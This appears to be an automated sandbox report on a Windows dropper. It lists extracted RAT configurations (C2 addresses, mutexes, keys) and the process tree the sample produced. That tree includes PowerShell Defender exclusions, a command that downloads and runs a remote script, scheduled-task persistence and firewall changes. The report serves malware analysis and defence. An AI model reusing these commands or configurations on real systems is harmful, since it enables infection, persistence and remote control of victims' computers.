Resubmissions
24-01-2025 01:23
250124-br1z1asnhz 1024-01-2025 00:12
250124-ag75wssjak 1028-11-2024 02:19
241128-cr9sks1kht 1027-11-2024 21:08
241127-zyzyaawqgn 1027-11-2024 20:16
241127-y145caymbs 1027-11-2024 20:13
241127-yzlxdavlen 1027-11-2024 19:53
241127-yl61dsxpcs 1027-11-2024 19:38
241127-ycrjcaxkfx 1027-11-2024 19:03
241127-xqsswsslej 1027-11-2024 19:03
241127-xqf44aslcr 3Analysis
-
max time kernel
817s -
max time network
845s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
-
submitted
24-01-2025 01:23
General
-
Target
New Text Document mod.exe
-
Size
8KB
-
MD5
69994ff2f00eeca9335ccd502198e05b
-
SHA1
b13a15a5bea65b711b835ce8eccd2a699a99cead
-
SHA256
2e2e035ece4accdee838ecaacdc263fa526939597954d18d1320d73c8bf810c2
-
SHA512
ced53147894ed2dfc980bcb50767d9734ba8021f85842a53bb4bb4c502d51b4e9884f5f74c4dd2b70b53cafbe2441376675f7bd0f19bb20a3becb091a34fb9f3
-
SSDEEP
96:y7ov9wc1dN1Unh3EHJ40CUJCrQt0LpCBIW12nEtgpH9GIkQYQoBNw9fnmK5iLjTv:yZyTFJfCB20LsBIW12n/eIkQ2BNg5S1
Score
10/10
Malware Config
Extracted
Family
xworm
Version
5.0
C2
137.184.74.73:5000
Mutex
WlO6Om8yfxIARVE4
Attributes
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/7G6zzQwJ
aes.plain
aes.plain
Extracted
Family
metasploit
Version
windows/reverse_tcp
C2
157.173.120.37:4444
140.238.122.17:1998
Extracted
Family
remcos
Botnet
RemoteHost
C2
stopeet.camdvr.org:2404
amalar.camdvr.org:2404
prosir.casacam.net:2404
dash.3utilities.com:2404
dash1.3utilities.com:2404
dash2.ddns.net:2404
bash.mywire.org:2404
bash1.accesscam.org:2404
dash3.ddns.net:2404
dash4.ddns.net:2404
bash2.accesscam.org:2404
Attributes
-
audio_folder
MicRecords
-
audio_path
%AppData%
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
abj.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
install_path
%AppData%
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
keylog_path
%AppData%
-
mouse_option
false
-
mutex
b2bhdjdhbvduhdi3ed-F3Q5YI
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
-
take_screenshot_title
notepad;solitaire;
Extracted
Family
njrat
Version
0.7d
Botnet
HacKed
C2
hakim32.ddns.net:2000
0.tcp.eu.ngrok.io:16872
Mutex
ef9410a92d1077d89c94b9208aa74f96
Attributes
-
reg_key
ef9410a92d1077d89c94b9208aa74f96
-
splitter
|'|'|
Extracted
Family
quasar
Version
1.4.1
Botnet
bot
C2
wexos47815-61484.portmap.host:61484
Mutex
06e2bb33-968c-4ca7-97dc-f23fbd5c3092
Attributes
-
encryption_key
8924CB3C9515DA437A37F5AE598376261E5528FC
-
install_name
msinfo32.exe
-
log_directory
Update
-
reconnect_delay
3000
-
startup_key
Discordupdate
-
subdirectory
dll32
Extracted
Family
xworm
Version
3.1
C2
172.86.108.55:7771
Attributes
-
Install_directory
%AppData%
-
install_file
USB.exe
Extracted
Family
quasar
Version
1.4.1
Botnet
VM-KU
C2
adidya354-21806.portmap.host:21806
Mutex
cf7c4d30-a326-47cc-a5f0-5a19aa014204
Attributes
-
encryption_key
E50BC33BC56B70B1A2963DE6EA1855A0E0D0FBCE
-
install_name
Windows Shell Interactive.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Shell Interactive
Extracted
Family
asyncrat
Version
A 13
Botnet
Default
C2
163.172.125.253:333
Mutex
AsyncMutex_555223
Attributes
-
delay
3
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
asyncrat
Version
Esco Private rat
Botnet
Default
C2
93.123.109.39:4449
Mutex
bcrikqwuktplgvg
Attributes
-
delay
1
-
install
false
-
install_folder
%AppData%
aes.plain
Extracted
Family
quasar
Version
1.4.1
Botnet
Office04
C2
192.168.1.79:4782
0.tcp.in.ngrok.io:14296
193.161.193.99:20466
Mutex
956eafb2-7482-407b-bff4-d2b57a1c3d75
Attributes
-
encryption_key
EFEBD005E03B8B8669985D9A167E2BEF9FFCA477
-
install_name
Client.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Quasar Client Startup
-
subdirectory
SubDir
Extracted
Family
quasar
Version
1.4.1
Botnet
ROBLOX EXECUTOR
C2
192.168.50.1:4782
10.0.0.113:4782
LETSQOOO-62766.portmap.host:62766
89.10.178.51:4782
Mutex
90faf922-159d-4166-b661-4ba16af8650e
Attributes
-
encryption_key
FFEE70B90F5EBED6085600C989F1D6D56E2DEC26
-
install_name
windows 3543.exe
-
log_directory
roblox executor
-
reconnect_delay
3000
-
startup_key
windows background updater
-
subdirectory
windows updater
Extracted
Family
quasar
Version
1.3.0.0
Botnet
School
C2
gamwtonxristo.ddns.net:1717
Mutex
QSR_MUTEX_M3Vba1npfJg3Ale25C
Attributes
-
encryption_key
VtojWKM7f1XyCVdB41wL
-
install_name
comctl32.exe
-
log_directory
Logs
-
reconnect_delay
3000
-
startup_key
Windows Defender Startup Scan
-
subdirectory
Windows Defender
Extracted
Family
asyncrat
Version
0.5.8
Botnet
Default
C2
2.tcp.eu.ngrok.io:19695
Mutex
gonq3XlXWgiz
Attributes
-
delay
3
-
install
false
-
install_folder
%AppData%
aes.plain
Signatures
-
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
-
Asyncrat family
-
Detect Xworm Payload 7 IoCs
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Metasploit family
-
NanoCore
NanoCore is a remote access tool (RAT) with a variety of capabilities.
-
Nanocore family
-
Njrat family
-
Quasar RAT 4 IoCs
Quasar is an open source Remote Access Tool.
-
Quasar family
-
Quasar payload 51 IoCs
-
Remcos
Remcos is a closed-source remote control and surveillance software.
-
Remcos family
-
UAC bypass 3 TTPs 2 IoCs
-
Xworm
Xworm is a remote access trojan written in C#.
-
Xworm family
-
njRAT/Bladabindi
Widely used RAT written in .NET.
-
Adds policy Run key to start application 2 TTPs 4 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Disables Task Manager via registry modification
-
Downloads MZ/PE file
-
Modifies Windows Firewall 2 TTPs 64 IoCs
-
Drops startup file 64 IoCs
-
Executes dropped EXE 64 IoCs
-
Loads dropped DLL 64 IoCs
-
Adds Run key to start application 2 TTPs 7 IoCs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Checks whether UAC is enabled 1 TTPs 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
-
Drops file in System32 directory 64 IoCs
-
Suspicious use of SetThreadContext 4 IoCs
-
Drops file in Program Files directory 64 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
-
Program crash 15 IoCs
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 64 IoCs
Adversaries may check for Internet connectivity on compromised systems.
-
Modifies registry key 1 TTPs 2 IoCs
-
Modifies system certificate store 2 TTPs 14 IoCs
-
Opens file in notepad (likely ransom note) 2 IoCs
-
Runs ping.exe 1 TTPs 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 64 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 18 IoCs
-
Suspicious behavior: MapViewOfSection 2 IoCs
-
Suspicious behavior: SetClipboardViewer 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of FindShellTrayWindow 64 IoCs
-
Suspicious use of SendNotifyMessage 64 IoCs
-
Suspicious use of SetWindowsHookEx 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"C:\Users\Admin\AppData\Local\Temp\New Text Document mod.exe"1⤵
- Quasar RAT
- Loads dropped DLL
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\a\T.exe"C:\Users\Admin\AppData\Local\Temp\a\T.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\T.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\T.exe' -Force3⤵
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe"Powershell.exe" -exec bypass -c Copy-Item 'C:\Users\Admin\AppData\Local\Temp\a\Enalib.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Enalib.exe' -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\SDriver.exe"C:\Users\Admin\AppData\Local\Temp\a\SDriver.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe"3⤵
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\RDriver.exe"C:\Users\Admin\AppData\Local\Temp\a\RDriver.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:/Users'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:/Windows'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:/NzdmYkGb'3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\PDriver.exe"C:\Users\Admin\AppData\Local\Temp\a\PDriver.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-RestMethod -Uri 'https://encrypthub.net/main/zakrep/worker.ps1' | Invoke-Expression"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\unins000.exe"C:\Users\Admin\AppData\Local\Temp\a\unins000.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1528 -s 6643⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\36.exe"C:\Users\Admin\AppData\Local\Temp\a\36.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1400 -s 1563⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\42.exe"C:\Users\Admin\AppData\Local\Temp\a\42.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1340 -s 1563⤵
- Loads dropped DLL
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\loclx.exe"C:\Users\Admin\AppData\Local\Temp\a\loclx.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\demon.x64.exe"C:\Users\Admin\AppData\Local\Temp\a\demon.x64.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\krankenhous.exe"C:\Users\Admin\AppData\Local\Temp\a\krankenhous.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\access.exe"C:\Users\Admin\AppData\Local\Temp\a\access.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\e.exe"C:\Users\Admin\AppData\Local\Temp\a\e.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\99999.exe"C:\Users\Admin\AppData\Local\Temp\a\99999.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
-
C:\Users\Admin\AppData\Roaming\server.exe"C:\Users\Admin\AppData\Roaming\server.exe"3⤵
- Drops startup file
- Executes dropped EXE
- Drops autorun.inf file
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Users\Admin\AppData\Roaming\server.exe" "server.exe" ENABLE4⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\a\22.exe"C:\Users\Admin\AppData\Local\Temp\a\22.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
-
C:\Users\Admin\AppData\Local\Temp\a\payload.exe"C:\Users\Admin\AppData\Local\Temp\a\payload.exe"2⤵
- Executes dropped EXE
-
-
C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"C:\Users\Admin\AppData\Local\Temp\a\discordupdate.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f3⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f4⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\vce7v9V1W2tm.bat" "4⤵
-
C:\Windows\system32\chcp.comchcp 650015⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost5⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f6⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\PQS0tTqSo0ng.bat" "6⤵
-
C:\Windows\system32\chcp.comchcp 650017⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost7⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"7⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f8⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\bSw6wcY0n6Yg.bat" "8⤵
-
C:\Windows\system32\chcp.comchcp 650019⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost9⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"9⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f10⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\mBtKK2UeUw3n.bat" "10⤵
-
C:\Windows\system32\chcp.comchcp 6500111⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost11⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"11⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f12⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\kjfTcVdHiNta.bat" "12⤵
-
C:\Windows\system32\chcp.comchcp 6500113⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost13⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"13⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f14⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\LyJVdEg4KJRX.bat" "14⤵
-
C:\Windows\system32\chcp.comchcp 6500115⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost15⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"15⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f16⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\LXv7TzgZfHWu.bat" "16⤵
-
C:\Windows\system32\chcp.comchcp 6500117⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost17⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"17⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f18⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\A1kUnwv4pY8h.bat" "18⤵
-
C:\Windows\system32\chcp.comchcp 6500119⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost19⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"19⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f20⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\X4E7gotGYhdc.bat" "20⤵
-
C:\Windows\system32\chcp.comchcp 6500121⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost21⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"21⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f22⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\ciM63Ib4VM83.bat" "22⤵
-
C:\Windows\system32\chcp.comchcp 6500123⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost23⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"23⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f24⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7BpToa2r6R2t.bat" "24⤵
-
C:\Windows\system32\chcp.comchcp 6500125⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost25⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"25⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f26⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\BJcfDpdVrrDn.bat" "26⤵
-
C:\Windows\system32\chcp.comchcp 6500127⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost27⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"27⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f28⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\4nupRPkpg2HN.bat" "28⤵
-
C:\Windows\system32\chcp.comchcp 6500129⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost29⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"29⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f30⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\7w61tqP0KSCw.bat" "30⤵
-
C:\Windows\system32\chcp.comchcp 6500131⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost31⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"31⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f32⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\v6Gr3xaOaL0B.bat" "32⤵
-
C:\Windows\system32\chcp.comchcp 6500133⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost33⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"33⤵
- Drops file in System32 directory
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f34⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\arjpmP9dQ2nr.bat" "34⤵
-
C:\Windows\system32\chcp.comchcp 6500135⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost35⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"35⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f36⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\YDF68G8fTygV.bat" "36⤵
-
C:\Windows\system32\chcp.comchcp 6500137⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost37⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"37⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f38⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\RRFijp3dCeTe.bat" "38⤵
-
C:\Windows\system32\chcp.comchcp 6500139⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost39⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"39⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f40⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\U3p6ULRDgY9l.bat" "40⤵
-
C:\Windows\system32\chcp.comchcp 6500141⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost41⤵
- Runs ping.exe
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"41⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f42⤵
- Scheduled Task/Job: Scheduled Task
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\gxq1Kb17IhZ1.bat" "42⤵
-
C:\Windows\system32\chcp.comchcp 6500143⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost43⤵
- System Network Configuration Discovery: Internet Connection Discovery
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"43⤵
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f44⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\N5n5KxTSxv3K.bat" "44⤵
-
C:\Windows\system32\chcp.comchcp 6500145⤵
-
-
C:\Windows\system32\PING.EXEping -n 10 localhost45⤵
-
-
C:\Windows\system32\dll32\msinfo32.exe"C:\Windows\system32\dll32\msinfo32.exe"45⤵
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\schtasks.exe"schtasks" /create /tn "Discordupdate" /sc ONLOGON /tr "C:\Windows\system32\dll32\msinfo32.exe" /rl HIGHEST /f46⤵
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\tvPkew0SzTgl.bat" "46⤵
-
C:\Windows\system32\chcp.comchcp 6500147⤵
-
-
